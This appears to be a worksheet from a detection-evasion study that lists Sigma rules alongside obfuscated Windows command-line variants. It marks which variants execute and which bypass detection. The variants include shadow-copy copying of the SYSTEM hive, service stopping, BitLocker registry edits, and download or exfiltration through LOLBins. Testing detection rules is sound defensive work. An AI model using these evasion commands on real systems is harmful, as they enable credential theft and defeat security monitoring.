      <c r="A973" s="41" t="inlineStr">
        <is>
          <t>t1567</t>
        </is>
      </c>
      <c r="B973" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_configsecuritypolicy_download_file</t>
        </is>
      </c>
      <c r="C973" s="41" t="inlineStr">
        <is>
          <t>Arbitrary File Download Via ConfigSecurityPolicy.EXE</t>
        </is>
      </c>
      <c r="D973" s="41" t="inlineStr">
        <is>
          <t>1f0f6176-6482-4027-b151-00071af39d7e</t>
        </is>
      </c>
      <c r="E973" s="41" t="inlineStr">
        <is>
          <t>ConfigSecurityPolicy.exe	C:\Temp\settings.xml	https://example.com/payload</t>
        </is>
      </c>
      <c r="F973" s="41" t="b">
        <v>0</v>
      </c>
      <c r="G973" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H973" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I973" s="41" t="n"/>
      <c r="J973" s="41" t="n"/>
      <c r="K973" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="974" ht="15.75" customHeight="1" s="42">
      <c r="A974" s="41" t="inlineStr">
        <is>
          <t>t1567</t>
        </is>
      </c>
      <c r="B974" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_data_exfiltration_by_using_datasvcutil</t>
        </is>
      </c>
      <c r="C974" s="41" t="inlineStr">
        <is>
          <t>LOLBAS Data Exfiltration by DataSvcUtil.exe</t>
        </is>
      </c>
      <c r="D974" s="41" t="inlineStr">
        <is>
          <t>e290b10b-1023-4452-a4a9-eb31a9013b3a</t>
        </is>
      </c>
      <c r="E974" s="41" t="inlineStr">
        <is>
          <t>DataSvcUtil.exe -in:http://127.0.0.1/service.svc -out:C:\Windows\Tasks\service.cs -uri:http://127.0.0.1</t>
        </is>
      </c>
      <c r="F974" s="41" t="b">
        <v>0</v>
      </c>
      <c r="G974" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H974" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I974" s="41" t="n"/>
      <c r="J974" s="41" t="n"/>
      <c r="K974" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="975" ht="15.75" customHeight="1" s="42">
      <c r="A975" s="41" t="inlineStr">
        <is>
          <t>t1567</t>
        </is>
      </c>
      <c r="B975" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_data_exfiltration_by_using_datasvcutil</t>
        </is>
      </c>
      <c r="C975" s="41" t="inlineStr">
        <is>
          <t>LOLBAS Data Exfiltration by DataSvcUtil.exe</t>
        </is>
      </c>
      <c r="D975" s="41" t="inlineStr">
        <is>
          <t>e290b10b-1023-4452-a4a9-eb31a9013b3a</t>
        </is>
      </c>
      <c r="E975" s="41" t="inlineStr">
        <is>
          <t>DataSvcUtil.exe "/in:"http://127.0.0.1/service.svc "/out:"C:\Windows\Tasks\service.cs "/uri:"http://127.0.0.1</t>
        </is>
      </c>
      <c r="F975" s="41" t="b">
        <v>0</v>
      </c>
      <c r="G975" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H975" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I975" s="41" t="n"/>
      <c r="J975" s="41" t="n"/>
      <c r="K975" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="976" ht="15.75" customHeight="1" s="42">
      <c r="A976" s="41" t="inlineStr">
        <is>
          <t>t1567</t>
        </is>
      </c>
      <c r="B976" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_data_exfiltration_by_using_datasvcutil</t>
        </is>
      </c>
      <c r="C976" s="41" t="inlineStr">
        <is>
          <t>LOLBAS Data Exfiltration by DataSvcUtil.exe</t>
        </is>
      </c>
      <c r="D976" s="41" t="inlineStr">
        <is>
          <t>e290b10b-1023-4452-a4a9-eb31a9013b3a</t>
        </is>
      </c>
      <c r="E976" s="41" t="inlineStr">
        <is>
          <t>cmd.exe /c DataSvcUtil.exe /^in:http://127.0.0.1/service.svc /^out:C:\Windows\Tasks\service.cs /^uri:http://127.0.0.1</t>
        </is>
      </c>
      <c r="F976" s="41" t="b">
        <v>0</v>
      </c>
      <c r="G976" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H976" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I976" s="41" t="n"/>
      <c r="J976" s="41" t="n"/>
      <c r="K976" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="977" ht="15.75" customHeight="1" s="42">
      <c r="A977" s="41" t="inlineStr">
        <is>
          <t>t1567</t>
        </is>
      </c>
      <c r="B977" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_data_exfiltration_by_using_datasvcutil</t>
        </is>
      </c>
      <c r="C977" s="41" t="inlineStr">
        <is>
          <t>LOLBAS Data Exfiltration by DataSvcUtil.exe</t>
        </is>
      </c>
      <c r="D977" s="41" t="inlineStr">
        <is>
          <t>e290b10b-1023-4452-a4a9-eb31a9013b3a</t>
        </is>
      </c>
      <c r="E977" s="41" t="inlineStr">
        <is>
          <t>DataSvcUtil.exe  /in:http://127.0.0.1/service.svc  /out:C:\Windows\Tasks\service.cs  /uri:http://127.0.0.1</t>
        </is>
      </c>
      <c r="F977" s="41" t="b">
        <v>0</v>
      </c>
      <c r="G977" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H977" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I977" s="41" t="n"/>
      <c r="J977" s="41" t="n"/>
      <c r="K977" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="978" ht="15.75" customHeight="1" s="42">
      <c r="A978" s="41" t="inlineStr">
        <is>
          <t>t1560</t>
        </is>
      </c>
      <c r="B978" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_tar_compression</t>
        </is>
      </c>
      <c r="C978" s="41" t="inlineStr">
        <is>
          <t>Compressed File Creation Via Tar.EXE</t>
        </is>
      </c>
      <c r="D978" s="41" t="inlineStr">
        <is>
          <t>418a3163-3247-4b7b-9933-dcfcb7c52ea9</t>
        </is>
      </c>
      <c r="E978" s="41" t="inlineStr">
        <is>
          <t>"C:\Windows\System32\tar.exe" --create -f C:\Temp\test.tar C:\Temp\test.txt</t>
        </is>
      </c>
      <c r="F978" s="41" t="b">
        <v>0</v>
      </c>
      <c r="G978" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H978" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I978" s="41" t="n"/>
      <c r="J978" s="41" t="n"/>
      <c r="K978" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="979" ht="15.75" customHeight="1" s="42">
      <c r="A979" s="41" t="inlineStr">
        <is>
          <t>t1560</t>
        </is>
      </c>
      <c r="B979" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_tar_compression</t>
        </is>
      </c>
      <c r="C979" s="41" t="inlineStr">
        <is>
          <t>Compressed File Creation Via Tar.EXE</t>
        </is>
      </c>
      <c r="D979" s="41" t="inlineStr">
        <is>
          <t>418a3163-3247-4b7b-9933-dcfcb7c52ea9</t>
        </is>
      </c>
      <c r="E979" s="41" t="inlineStr">
        <is>
          <t>"C:\Windows\System32\tar.exe" cf C:\Temp\test.tar C:\Temp\test.txt</t>
        </is>
      </c>
      <c r="F979" s="41" t="b">
        <v>0</v>
      </c>
      <c r="G979" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H979" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I979" s="41" t="n"/>
      <c r="J979" s="41" t="n"/>
      <c r="K979" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="980" ht="15.75" customHeight="1" s="42">
      <c r="A980" s="41" t="inlineStr">
        <is>
          <t>t1560</t>
        </is>
      </c>
      <c r="B980" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_tar_compression</t>
        </is>
      </c>
      <c r="C980" s="41" t="inlineStr">
        <is>
          <t>Compressed File Creation Via Tar.EXE</t>
        </is>
      </c>
      <c r="D980" s="41" t="inlineStr">
        <is>
          <t>418a3163-3247-4b7b-9933-dcfcb7c52ea9</t>
        </is>
      </c>
      <c r="E980" s="41" t="inlineStr">
        <is>
          <t>cmd.exe /c "C:\Windows\System32\tar.exe" -^cf C:\Temp\test.tar C:\Temp\test.txt</t>
        </is>
      </c>
      <c r="F980" s="41" t="b">
        <v>1</v>
      </c>
      <c r="G980" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H980" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I980" s="41" t="inlineStr">
        <is>
          <t>Compressed File Creation Via Tar.EXE (418a3163-3247-4b7b-9933-dcfcb7c52ea9)</t>
        </is>
      </c>
      <c r="J980" s="41" t="n"/>
      <c r="K980" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="981" ht="15.75" customHeight="1" s="42">
      <c r="A981" s="41" t="inlineStr">
        <is>
          <t>t1560</t>
        </is>
      </c>
      <c r="B981" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_tar_extraction</t>
        </is>
      </c>
      <c r="C981" s="41" t="inlineStr">
        <is>
          <t>Compressed File Extraction Via Tar.EXE</t>
        </is>
      </c>
      <c r="D981" s="41" t="inlineStr">
        <is>
          <t>bf361876-6620-407a-812f-bfe11e51e924</t>
        </is>
      </c>
      <c r="E981" s="41" t="inlineStr">
        <is>
          <t>tar.exe --extract -vf C:\Temp\test.tar -C C:\Temp</t>
        </is>
      </c>
      <c r="F981" s="41" t="b">
        <v>1</v>
      </c>
      <c r="G981" s="41" t="b">
        <v>1</v>
      </c>
      <c r="H981" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I981" s="41" t="inlineStr">
        <is>
          <t>Compressed File Creation Via Tar.EXE (418a3163-3247-4b7b-9933-dcfcb7c52ea9)</t>
        </is>
      </c>
      <c r="J981" s="41" t="n"/>
      <c r="K981" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="982" ht="15.75" customHeight="1" s="42">
      <c r="A982" s="41" t="inlineStr">
        <is>
          <t>t1560</t>
        </is>
      </c>
      <c r="B982" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_tar_extraction</t>
        </is>
      </c>
      <c r="C982" s="41" t="inlineStr">
        <is>
          <t>Compressed File Extraction Via Tar.EXE</t>
        </is>
      </c>
      <c r="D982" s="41" t="inlineStr">
        <is>
          <t>bf361876-6620-407a-812f-bfe11e51e924</t>
        </is>
      </c>
      <c r="E982" s="41" t="inlineStr">
        <is>
          <t>tar.exe xvf C:\Temp\test.tar -C C:\Temp</t>
        </is>
      </c>
      <c r="F982" s="41" t="b">
        <v>1</v>
      </c>
      <c r="G982" s="41" t="b">
        <v>1</v>
      </c>
      <c r="H982" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I982" s="41" t="inlineStr">
        <is>
          <t>Compressed File Creation Via Tar.EXE (418a3163-3247-4b7b-9933-dcfcb7c52ea9)</t>
        </is>
      </c>
      <c r="J982" s="41" t="n"/>
      <c r="K982" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="983" ht="15.75" customHeight="1" s="42">
      <c r="A983" s="41" t="inlineStr">
        <is>
          <t>t1560</t>
        </is>
      </c>
      <c r="B983" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_tar_extraction</t>
        </is>
      </c>
      <c r="C983" s="41" t="inlineStr">
        <is>
          <t>Compressed File Extraction Via Tar.EXE</t>
        </is>
      </c>
      <c r="D983" s="41" t="inlineStr">
        <is>
          <t>bf361876-6620-407a-812f-bfe11e51e924</t>
        </is>
      </c>
      <c r="E983" s="41" t="inlineStr">
        <is>
          <t>cmd.exe /c tar.exe -^xvf C:\Temp\test.tar -C C:\Temp</t>
        </is>
      </c>
      <c r="F983" s="41" t="b">
        <v>1</v>
      </c>
      <c r="G983" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H983" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I983" s="41" t="inlineStr">
        <is>
          <t>Compressed File Creation Via Tar.EXE (418a3163-3247-4b7b-9933-dcfcb7c52ea9); Compressed File Extraction Via Tar.EXE (bf361876-6620-407a-812f-bfe11e51e924)</t>
        </is>
      </c>
      <c r="J983" s="41" t="n"/>
      <c r="K983" s="41" t="b">
        <v>0</v>
      </c>
    </row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  <row r="1001" ht="15.75" customHeight="1" s="42"/>
    <row r="1002" ht="15.75" customHeight="1" s="42"/>
    <row r="1003" ht="15.75" customHeight="1" s="42"/>
    <row r="1004" ht="15.75" customHeight="1" s="42"/>
    <row r="1005" ht="15.75" customHeight="1" s="42"/>
  </sheetData>
  <autoFilter ref="A1:K983"/>
  <dataValidations count="3">
    <dataValidation sqref="F2:H187" showDropDown="1" showInputMessage="0" showErrorMessage="1" allowBlank="1" type="list">
      <formula1>"TRUE,FALSE"</formula1>
    </dataValidation>
    <dataValidation sqref="A2:A187" showDropDown="1" showInputMessage="0" showErrorMessage="1" allowBlank="1" type="list">
      <formula1>"t1012,t1021.002,t1039,t1048.003,t1087.002,t1048,t1567,t1560,t1563.002"</formula1>
    </dataValidation>
    <dataValidation sqref="J2:J187" showDropDown="1" showInputMessage="0" showErrorMessage="0" allowBlank="1" type="custom">
      <formula1>AND(ISNUMBER(J2),(NOT(OR(NOT(ISERROR(DATEVALUE(J2))), AND(ISNUMBER(J2), LEFT(CELL("format", J2))="D")))))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7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2" min="1" max="1"/>
    <col width="43" customWidth="1" style="42" min="2" max="2"/>
    <col width="36" customWidth="1" style="42" min="3" max="3"/>
    <col width="38" customWidth="1" style="42" min="4" max="4"/>
    <col width="86.43000000000001" customWidth="1" style="42" min="5" max="5"/>
    <col width="18.43" customWidth="1" style="42" min="6" max="6"/>
    <col width="21.71" customWidth="1" style="42" min="7" max="7"/>
    <col width="18.57" customWidth="1" style="42" min="8" max="8"/>
    <col width="18" customWidth="1" style="42" min="9" max="10"/>
    <col width="13" customWidth="1" style="42" min="11" max="11"/>
  </cols>
  <sheetData>
    <row r="1" ht="22.5" customHeight="1" s="42">
      <c r="A1" s="1" t="inlineStr">
        <is>
          <t>Technical</t>
        </is>
      </c>
      <c r="B1" s="1" t="inlineStr">
        <is>
          <t>Rule_name</t>
        </is>
      </c>
      <c r="C1" s="1" t="inlineStr">
        <is>
          <t>Title</t>
        </is>
      </c>
      <c r="D1" s="1" t="inlineStr">
        <is>
          <t>Rule_id</t>
        </is>
      </c>
      <c r="E1" s="1" t="inlineStr">
        <is>
          <t>Commandline_evasion</t>
        </is>
      </c>
      <c r="F1" s="1" t="inlineStr">
        <is>
          <t>Excutable</t>
        </is>
      </c>
      <c r="G1" s="1" t="inlineStr">
        <is>
          <t>Bypass target rule</t>
        </is>
      </c>
      <c r="H1" s="1" t="inlineStr">
        <is>
          <t>Bypass all rule</t>
        </is>
      </c>
      <c r="I1" s="1" t="inlineStr">
        <is>
          <t>Trigger rule</t>
        </is>
      </c>
      <c r="J1" s="1" t="inlineStr">
        <is>
          <t>LLM</t>
        </is>
      </c>
      <c r="K1" s="1" t="inlineStr">
        <is>
          <t>behavior</t>
        </is>
      </c>
    </row>
    <row r="2" ht="22.5" customHeight="1" s="42">
      <c r="A2" s="43" t="inlineStr">
        <is>
          <t>t1489</t>
        </is>
      </c>
      <c r="B2" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_stop_service</t>
        </is>
      </c>
      <c r="C2" s="44" t="inlineStr">
        <is>
          <t>Stop Windows Service Via PowerShell Stop-Service</t>
        </is>
      </c>
      <c r="D2" s="44" t="inlineStr">
        <is>
          <t>c49c5062-0966-4170-9efd-9968c913a6cf</t>
        </is>
      </c>
      <c r="E2" s="43" t="inlineStr">
        <is>
          <t>"powershell.exe" &amp; {Stop-Service  -Name ""fax"" -force -erroraction silentlycontinue}</t>
        </is>
      </c>
      <c r="F2" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I2" s="43" t="n"/>
      <c r="J2" s="43" t="n">
        <v>2</v>
      </c>
      <c r="K2" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3" ht="22.5" customHeight="1" s="42">
      <c r="A3" s="43" t="inlineStr">
        <is>
          <t>t1489</t>
        </is>
      </c>
      <c r="B3" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_stop_service</t>
        </is>
      </c>
      <c r="C3" s="44" t="inlineStr">
        <is>
          <t>Stop Windows Service Via PowerShell Stop-Service</t>
        </is>
      </c>
      <c r="D3" s="44" t="inlineStr">
        <is>
          <t>c49c5062-0966-4170-9efd-9968c913a6cf</t>
        </is>
      </c>
      <c r="E3" s="43" t="inlineStr">
        <is>
          <t>"powershell.exe" &amp; {&amp; 'Stop-Service' -Name ""fax"" -force -erroraction silentlycontinue}</t>
        </is>
      </c>
      <c r="F3" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I3" s="43" t="n"/>
      <c r="J3" s="43" t="n">
        <v>2</v>
      </c>
      <c r="K3" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="4" ht="22.5" customHeight="1" s="42">
      <c r="A4" s="43" t="inlineStr">
        <is>
          <t>t1489</t>
        </is>
      </c>
      <c r="B4" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_stop_service</t>
        </is>
      </c>
      <c r="C4" s="43" t="inlineStr">
        <is>
          <t>Stop Windows Service Via PowerShell Stop-Service</t>
        </is>
      </c>
      <c r="D4" s="43" t="inlineStr">
        <is>
          <t>c49c5062-0966-4170-9efd-9968c913a6cf</t>
        </is>
      </c>
      <c r="E4" s="43" t="inlineStr">
        <is>
          <t>"powershell.exe" &amp; {spsv -Name ""fax"" -force -erroraction silentlycontinue}</t>
        </is>
      </c>
      <c r="F4" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I4" s="43" t="n"/>
      <c r="J4" s="43" t="n">
        <v>2</v>
      </c>
      <c r="K4" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="5" ht="22.5" customHeight="1" s="42">
      <c r="A5" s="43" t="inlineStr">
        <is>
          <t>t1490</t>
        </is>
      </c>
      <c r="B5" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_shadowcopy_access</t>
        </is>
      </c>
      <c r="C5" s="43" t="inlineStr">
        <is>
          <t>Copy From VolumeShadowCopy Via Cmd.EXE</t>
        </is>
      </c>
      <c r="D5" s="43" t="inlineStr">
        <is>
          <t>c73124a7-3e89-44a3-bdc1-25fe4df754b1</t>
        </is>
      </c>
      <c r="E5" s="43" t="inlineStr">
        <is>
          <t>"cmd.exe" /c "copy "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\Windows\Temp\VSC_SYSTEM_HIVE</t>
        </is>
      </c>
      <c r="F5" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G5" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H5" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I5" s="43" t="n"/>
      <c r="J5" s="43" t="n">
        <v>2</v>
      </c>
      <c r="K5" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="6" ht="22.5" customHeight="1" s="42">
      <c r="A6" s="43" t="inlineStr">
        <is>
          <t>t1490</t>
        </is>
      </c>
      <c r="B6" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_shadowcopy_access</t>
        </is>
      </c>
      <c r="C6" s="43" t="inlineStr">
        <is>
          <t>Copy From VolumeShadowCopy Via Cmd.EXE</t>
        </is>
      </c>
      <c r="D6" s="43" t="inlineStr">
        <is>
          <t>c73124a7-3e89-44a3-bdc1-25fe4df754b1</t>
        </is>
      </c>
      <c r="E6" s="43" t="inlineStr">
        <is>
          <t>"cmd.exe" /c c^opy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\Windows\Temp\VSC_SYSTEM_HIVE</t>
        </is>
      </c>
      <c r="F6" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G6" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H6" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I6" s="43" t="n"/>
      <c r="J6" s="43" t="n">
        <v>2</v>
      </c>
      <c r="K6" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="7" ht="22.5" customHeight="1" s="42">
      <c r="A7" s="43" t="inlineStr">
        <is>
          <t>t1490</t>
        </is>
      </c>
      <c r="B7" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_shadowcopy_access</t>
        </is>
      </c>
      <c r="C7" s="43" t="inlineStr">
        <is>
          <t>Copy From VolumeShadowCopy Via Cmd.EXE</t>
        </is>
      </c>
      <c r="D7" s="43" t="inlineStr">
        <is>
          <t>c73124a7-3e89-44a3-bdc1-25fe4df754b1</t>
        </is>
      </c>
      <c r="E7" s="43" t="inlineStr">
        <is>
          <t>"cmd.exe" /c copy \\.\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\Windows\Temp\VSC_SYSTEM_HIVE</t>
        </is>
      </c>
      <c r="F7" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G7" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H7" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I7" s="43" t="n"/>
      <c r="J7" s="43" t="n">
        <v>2</v>
      </c>
      <c r="K7" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="8" ht="22.5" customHeight="1" s="42">
      <c r="A8" s="43" t="inlineStr">
        <is>
          <t>t1490</t>
        </is>
      </c>
      <c r="B8" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_sensitive_file_access_shadowcopy</t>
        </is>
      </c>
      <c r="C8" s="43" t="inlineStr">
        <is>
          <t>Sensitive File Access Via Volume Shadow Copy Backup</t>
        </is>
      </c>
      <c r="D8" s="43" t="inlineStr">
        <is>
          <t>f57f8d16-1f39-4dcb-a604-6c73d9b54b3d</t>
        </is>
      </c>
      <c r="E8" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "set vsc=\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy&amp;&amp; call copy %%vsc%%1\Windows\System32\config\SYSTEM C:\Windows\Temp\SYSTEM_VSC"</t>
        </is>
      </c>
      <c r="F8" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G8" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H8" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I8" s="43" t="n"/>
      <c r="J8" s="43" t="n">
        <v>2</v>
      </c>
      <c r="K8" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="9" ht="22.5" customHeight="1" s="42">
      <c r="A9" s="44" t="inlineStr">
        <is>
          <t>t1070</t>
        </is>
      </c>
      <c r="B9" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_fsutil_usage</t>
        </is>
      </c>
      <c r="C9" s="44" t="inlineStr">
        <is>
          <t>Fsutil Suspicious Invocation</t>
        </is>
      </c>
      <c r="D9" s="44" t="inlineStr">
        <is>
          <t>add64136-62e5-48ea-807e-88638d02df1e</t>
        </is>
      </c>
      <c r="E9" s="44" t="inlineStr">
        <is>
          <t>notepad.exe</t>
        </is>
      </c>
      <c r="F9" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G9" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H9" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I9" s="43" t="n"/>
      <c r="J9" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K9" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="10" ht="22.5" customHeight="1" s="42">
      <c r="A10" s="44" t="inlineStr">
        <is>
          <t>t1485</t>
        </is>
      </c>
      <c r="B10" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_fsutil_usage</t>
        </is>
      </c>
      <c r="C10" s="44" t="inlineStr">
        <is>
          <t>Fsutil Suspicious Invocation</t>
        </is>
      </c>
      <c r="D10" s="44" t="inlineStr">
        <is>
          <t>add64136-62e5-48ea-807e-88638d02df1e</t>
        </is>
      </c>
      <c r="E10" s="44" t="inlineStr">
        <is>
          <t>notepad.exe</t>
        </is>
      </c>
      <c r="F10" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G10" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H10" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I10" s="43" t="n"/>
      <c r="J10" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K10" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="11" ht="22.5" customHeight="1" s="42">
      <c r="A11" s="43" t="inlineStr">
        <is>
          <t>t1486</t>
        </is>
      </c>
      <c r="B11" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_bitlocker</t>
        </is>
      </c>
      <c r="C11" s="44" t="inlineStr">
        <is>
          <t>Suspicious Reg Add BitLocker</t>
        </is>
      </c>
      <c r="D11" s="44" t="inlineStr">
        <is>
          <t>0e0255bf-2548-47b8-9582-c0955c9283f5</t>
        </is>
      </c>
      <c r="E11" s="43" t="inlineStr">
        <is>
          <t>reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\FVE" /v "EnableBDE"^"WithNoTPM" /t REG_DWORD /d 1 /f</t>
        </is>
      </c>
      <c r="F11" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G11" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H11" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I11" s="43" t="n"/>
      <c r="J11" s="43" t="n">
        <v>1</v>
      </c>
      <c r="K11" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="12" ht="22.5" customHeight="1" s="42">
      <c r="A12" s="43" t="inlineStr">
        <is>
          <t>t1489</t>
        </is>
      </c>
      <c r="B12" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_net_stop_service</t>
        </is>
      </c>
      <c r="C12" s="44" t="inlineStr">
        <is>
          <t>Stop Windows Service Via Net.EXE</t>
        </is>
      </c>
      <c r="D12" s="44" t="inlineStr">
        <is>
          <t>88872991-7445-4a22-90b2-a3adadb0e827</t>
        </is>
      </c>
      <c r="E12" s="43" t="inlineStr">
        <is>
          <t>net.exe	stop	"ServiceName"</t>
        </is>
      </c>
      <c r="F12" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G12" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H12" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I12" s="43" t="n"/>
      <c r="J12" s="43" t="n">
        <v>1</v>
      </c>
      <c r="K12" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="13" ht="22.5" customHeight="1" s="42">
      <c r="A13" s="43" t="inlineStr">
        <is>
          <t>t1489</t>
        </is>
      </c>
      <c r="B13" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_sc_stop_service</t>
        </is>
      </c>
      <c r="C13" s="44" t="inlineStr">
        <is>
          <t>Stop Windows Service Via Sc.EXE</t>
        </is>
      </c>
      <c r="D13" s="44" t="inlineStr">
        <is>
          <t>81bcb81b-5b1f-474b-b373-52c871aaa7b1</t>
        </is>
      </c>
      <c r="E13" s="43" t="inlineStr">
        <is>
          <t>sc.exe "stop" spooler</t>
        </is>
      </c>
      <c r="F13" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G13" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H13" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I13" s="43" t="n"/>
      <c r="J13" s="43" t="n">
        <v>2</v>
      </c>
      <c r="K13" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="14" ht="22.5" customHeight="1" s="42">
      <c r="A14" s="43" t="inlineStr">
        <is>
          <t>t1489</t>
        </is>
      </c>
      <c r="B14" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_sc_stop_service</t>
        </is>
      </c>
      <c r="C14" s="44" t="inlineStr">
        <is>
          <t>Stop Windows Service Via Sc.EXE</t>
        </is>
      </c>
      <c r="D14" s="44" t="inlineStr">
        <is>
          <t>81bcb81b-5b1f-474b-b373-52c871aaa7b1</t>
        </is>
      </c>
      <c r="E14" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c sc.exe st^op spooler</t>
        </is>
      </c>
      <c r="F14" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G14" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H14" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I14" s="43" t="inlineStr">
        <is>
          <t>Stop Windows Service Via Sc.EXE (81bcb81b-5b1f-474b-b373-52c871aaa7b1)</t>
        </is>
      </c>
      <c r="J14" s="43" t="n">
        <v>2</v>
      </c>
      <c r="K14" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="15" ht="22.5" customHeight="1" s="42">
      <c r="A15" s="43" t="inlineStr">
        <is>
          <t>t1489</t>
        </is>
      </c>
      <c r="B15" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_sc_stop_service</t>
        </is>
      </c>
      <c r="C15" s="43" t="inlineStr">
        <is>
          <t>Stop Windows Service Via Sc.EXE</t>
        </is>
      </c>
      <c r="D15" s="43" t="inlineStr">
        <is>
          <t>81bcb81b-5b1f-474b-b373-52c871aaa7b1</t>
        </is>
      </c>
      <c r="E15" s="43" t="inlineStr">
        <is>
          <t>sc.exe stop= spooler</t>
        </is>
      </c>
      <c r="F15" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G15" s="43" t="b">
        <v>1</v>
      </c>
